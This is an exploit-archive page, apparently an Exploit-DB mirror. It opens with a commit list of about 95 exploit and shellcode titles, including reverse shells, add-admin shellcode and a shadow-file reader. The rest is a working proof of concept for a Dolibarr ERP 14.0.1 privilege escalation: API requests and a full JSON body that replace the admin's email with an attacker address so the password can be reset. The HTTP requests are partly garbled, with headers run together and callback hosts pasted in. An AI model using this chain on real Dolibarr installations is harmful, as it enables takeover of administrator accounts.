de260aeac6
95 changes to exploits/shellcodes Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC) Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC) AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC) Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC) WordPress Plugin WPGraphQL 1.3.5 - Denial of Service Sandboxie 5.49.7 - Denial of Service (PoC) WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC) iDailyDiary 4.30 - Denial of Service (PoC) RarmaRadio 2.72.8 - Denial of Service (PoC) DupTerminator 1.4.5639.37199 - Denial of Service (PoC) Color Notes 1.4 - Denial of Service (PoC) Macaron Notes great notebook 5.5 - Denial of Service (PoC) My Notes Safe 5.3 - Denial of Service (PoC) n+otes 1.6.2 - Denial of Service (PoC) Telegram Desktop 2.9.2 - Denial of Service (PoC) Mini-XML 3.2 - Heap Overflow Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (2) Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (3) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2) MariaDB 10.2 - 'wsrep_provider' OS Command Execution Microsoft Internet Explorer 11 and WPAD service 'Jscript.dll' - Use-After-Free Visual Studio Code 1.47.1 - Denial of Service (PoC) DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE) MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2) Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC) GNU Wget < 1.18 - Arbitrary File Upload (2) WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS) E-Learning System 1.0 - Authentication Bypass PEEL Shopping 9.3.0 - 'Comments' Persistent Cross-Site Scripting GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Persistent Cross-Site Scripting Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated) Library System 1.0 - Authentication Bypass Web Based Quiz System 1.0 - 'name' Persistent Cross-Site Scripting Dolibarr ERP 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE) GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery GravCMS 1.10.7 - Unauthenticated Arbitrary File Write (Metasploit) Umbraco v8.14.1 - 'baseUrl' SSRF Cacti 1.2.12 - 'filter' SQL Injection GetSimple CMS Custom JS 0.1 - Cross-Site Request Forgery Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated) Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting Xmind 2020 - Persistent Cross-Site Scripting Tagstoo 2.0.1 - Persistent Cross-Site Scripting SnipCommand 0.1.0 - Persistent Cross-Site Scripting Moeditor 0.2.0 - Persistent Cross-Site Scripting Marky 0.0.1 - Persistent Cross-Site Scripting StudyMD 0.3.2 - Persistent Cross-Site Scripting Freeter 1.2.1 - Persistent Cross-Site Scripting Markright 1.0 - Persistent Cross-Site Scripting Markdownify 1.2.0 - Persistent Cross-Site Scripting Anote 1.0 - Persistent Cross-Site Scripting Subrion CMS 4.2.1 - Arbitrary File Upload Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated) Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver) CHIYU IoT Devices - Denial of Service (DoS) Zenario CMS 8.8.52729 - 'cID' SQL injection (Authenticated) TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal Atlassian Jira Server Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS) Scratch Desktop 3.17 - Remote Code Execution Church Management System 1.0 - Arbitrary File Upload (Authenticated) Phone Shop Sales Managements System 1.0 - Arbitrary File Upload Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS) WordPress Plugin Current Book 1.0.1 - 'Book Title' Persistent Cross-Site Scripting ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated) KevinLAB BEMS 1.0 - Authentication Bypass Event Registration System with QR Code 1.0 - Authentication Bypass CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) Panasonic Sanyo CCTV Network Camera 2.03-0x - Cross-Site Request Forgery (Change Password) qdPM 9.2 - Password Exposure (Unauthenticated) ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) Movable Type 7 r.5002 - XMLRPC API OS Command Injection (Metasploit) GeoVision Geowebserver 5.3.3 - Local FIle Inclusion Simple Phone Book 1.0 - 'Username' SQL Injection (Unauthenticated) Umbraco CMS 8.9.1 - Directory Traversal Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Dolibarr ERP 14.0.1 - Privilege Escalation Compro Technology IP Camera - 'killps.cgi' Denial of Service (DoS) Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation Phpwcms 1.9.30 - Arbitrary File Upload Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes) Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes) Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes) Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes) Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes) Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes) Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes) Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes) Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes) Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)
192 lines
No EOL
5.3 KiB
Text
192 lines
No EOL
5.3 KiB
Text
# Exploit Title: Dolibarr ERP/CRM 14.0.1 - Privilege Escalation
|
|
# Date: April 8, 2021
|
|
# Exploit Author: Vishwaraj101
|
|
# Vendor Homepage: https://www.dolibarr.org/
|
|
# Affected Version: <= 14.0.1
|
|
# Patch: https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d
|
|
|
|
*Summary:*
|
|
Using the below chain of issues attacker can compromise any dolibarr
|
|
user account including the admin.
|
|
|
|
*Poc:*
|
|
|
|
1. Visit https://example.com/api/index.php/login?login=demo&password=demo
|
|
try to login with a test user with 0 permissons or less permissions.
|
|
2. We will receive an api token in return.
|
|
3. Next we need to fetch the user id of the user whose account we want
|
|
to own.
|
|
|
|
|
|
|
|
*First we need to fetch the user id of the admin user using the below api.*
|
|
|
|
*Request1:*
|
|
|
|
GET /api/index.php/users/login/admin HTTP/1.1Host:
|
|
preview2.dolibarr.ohttps://preview2.dolibarr.org/api/index.php/users/login/adminrg
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
|
|
(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
|
|
root@tqn9xk6rn6fq8x9ijbmpouosrjxan3srh.burpcollaborator.netAccept:
|
|
application/json
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflateDOLAPIKEY: test1337Connection: close
|
|
|
|
*This will return the user details using the username. Now update the
|
|
victim user account via below api (include the json body received from the
|
|
previous request1 and replace the email id from below json to the attacker
|
|
controlled email)*
|
|
|
|
|
|
*Request2:*PUT /api/index.php/users/*12* HTTP/1.1
|
|
|
|
Host: preview2.dolibarr.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1;
|
|
WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87
|
|
Safari/537.36 root@67bmexn44jw3paqv0o3257558wen5mwal.burpcollaborator.netAccept:
|
|
application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip,
|
|
deflateDOLAPIKEY: test1337Origin:
|
|
https://preview2.dolibarr.orgConnection: closeReferer:
|
|
http://5z5l6wf3wio2h9iusnv1x6x40v6mxkw8l.burpcollaborator.net/refContent-Length:
|
|
3221
|
|
{
|
|
"id": "12",
|
|
"statut": "1",
|
|
"employee": "1",
|
|
"civility_code": null,
|
|
"gender": "woman",
|
|
"birth": 495583200,
|
|
"email": "*attacker@example.com <attacker@example.com>*",
|
|
"personal_email": "",
|
|
"socialnetworks": {
|
|
"facebook": "",
|
|
"skype": "",
|
|
"twitter": "",
|
|
"linkedin": "",
|
|
"instagram": "",
|
|
"snapchat": "",
|
|
"googleplus": "",
|
|
"youtube": "",
|
|
"whatsapp": "",
|
|
"tumblr": "",
|
|
"vero": "",
|
|
"viadeo": "",
|
|
"slack": "",
|
|
"xing": "",
|
|
"meetup": "",
|
|
"pinterest": "",
|
|
"flickr": "",
|
|
"500px": "",
|
|
"giphy": "",
|
|
"gifycat": "",
|
|
"dailymotion": "",
|
|
"vimeo": "",
|
|
"periscope": "",
|
|
"twitch": "",
|
|
"discord": "",
|
|
"wikipedia": "",
|
|
"reddit": "",
|
|
"quora": "",
|
|
"tripadvisor": "",
|
|
"mastodon": "",
|
|
"diaspora": "",
|
|
"viber": ""
|
|
},
|
|
"job": "Admin Technical",
|
|
"signature": "",
|
|
"address": "",
|
|
"zip": "",
|
|
"town": "",
|
|
"state_id": null,
|
|
"state_code": null,
|
|
"state": null,
|
|
"office_phone": "",
|
|
"office_fax": "",
|
|
"user_mobile": "",
|
|
"personal_mobile": "",
|
|
"admin": "1",
|
|
"login": "admin",
|
|
"entity": "0",
|
|
"datec": 1507187386,
|
|
"datem": 1617819214,
|
|
"socid": null,
|
|
"contact_id": null,
|
|
"fk_member": null,
|
|
"fk_user": "11",
|
|
"fk_user_expense_validator": null,
|
|
"fk_user_holiday_validator": null,
|
|
"clicktodial_url": null,
|
|
"clicktodial_login": null,
|
|
"clicktodial_poste": null,
|
|
"datelastlogin": 1617816891,
|
|
"datepreviouslogin": 1617815935,
|
|
"datestartvalidity": "",
|
|
"dateendvalidity": "",
|
|
"photo": "com.jpg",
|
|
"lang": "fr_FR",
|
|
"rights": {
|
|
"user": {
|
|
"user": {},
|
|
"self": {}
|
|
}
|
|
},
|
|
"conf": {},
|
|
"users": [],
|
|
"parentof": null,
|
|
"accountancy_code": "",
|
|
"weeklyhours": "39.00000000",
|
|
"color": "",
|
|
"dateemployment": "",
|
|
"dateemploymentend": "",
|
|
"default_c_exp_tax_cat": null,
|
|
"default_range": null,
|
|
"fk_warehouse": null,
|
|
"import_key": null,
|
|
"array_options": [],
|
|
"array_languages": null,
|
|
"linkedObjectsIds": null,
|
|
"canvas": null,
|
|
"fk_project": null,
|
|
"contact": null,
|
|
"thirdparty": null,
|
|
"user": null,
|
|
"origin": null,
|
|
"origin_id": null,
|
|
"ref": "12",
|
|
"ref_ext": null,
|
|
"status": null,
|
|
"country": null,
|
|
"country_id": null,
|
|
"country_code": "",
|
|
"region_id": null,
|
|
"barcode_type": null,
|
|
"barcode_type_code": null,
|
|
"barcode_type_label": null,
|
|
"barcode_type_coder": null,
|
|
"mode_reglement_id": null,
|
|
"cond_reglement_id": null,
|
|
"demand_reason_id": null,
|
|
"transport_mode_id": null,
|
|
"cond_reglement": null,
|
|
"modelpdf": null,
|
|
"last_main_doc": null,
|
|
"fk_bank": null,
|
|
"fk_account": null,
|
|
"note_public": "",
|
|
"note_private": "",
|
|
"note": "",
|
|
"name": null,
|
|
"lastname": "Adminson",
|
|
"firstname": "Alice",
|
|
"civility_id": null,
|
|
"date_creation": null,
|
|
"date_validation": null,
|
|
"date_modification": null,
|
|
"specimen": 0,
|
|
"alreadypaid": null,
|
|
"liste_limit": 0
|
|
}
|
|
|
|
This will reset the admin email account to the attacker controlled
|
|
email account, now using the password reset feature attacker will
|
|
reset the admin account password and will gain access to the admin
|
|
account. |